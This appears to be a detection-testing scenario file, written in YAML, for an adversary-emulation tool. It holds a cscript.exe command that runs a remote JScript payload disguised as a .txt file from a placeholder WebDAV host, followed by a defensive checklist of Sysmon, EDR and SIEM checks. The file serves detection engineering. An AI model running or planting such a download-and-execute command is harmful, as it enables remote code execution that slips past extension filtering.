id: DLEXEC_005_cscript_jscript_webdav
name: "Download and Execute — Cscript JScript via WebDAV"
mitre: "T1059.007, T1105"
category: download_execute
description: >
  Executes a remote JScript payload from a WebDAV share using cscript.exe with
  the //E:jscript engine flag. Allows arbitrary code execution via a text file
  disguised as a non-script extension. Replace PLACEHOLDER_WEBDAV_HOST and
  PLACEHOLDER_PAYLOAD with your WebDAV server and payload path.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-005] Cscript JScript execution from WebDAV"

  - type: exec
    binary: cscript.exe
    args: //E:jscript \\PLACEHOLDER_WEBDAV_HOST\PLACEHOLDER_FOLDER\PLACEHOLDER_PAYLOAD.txt
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "Sysmon Event ID 1: cscript.exe with //E:jscript and UNC path captured?"
  - "Sysmon Event ID 3: Network connection from cscript.exe to WebDAV host?"
  - "EDR: Alert on cscript.exe with engine override flag (//E:jscript)?"
  - "EDR: Payload file extension (.txt) — did EDR inspect content or trust extension?"
  - "SIEM: cscript.exe process events present and queryable?"
  - "Rule opportunity: cscript.exe or wscript.exe with //E: engine override in commandline"
  - "Rule opportunity: cscript.exe executing from UNC path"
  - "Gap check: //E:jscript on a .txt file bypasses file extension filtering — test if EDR catches it."
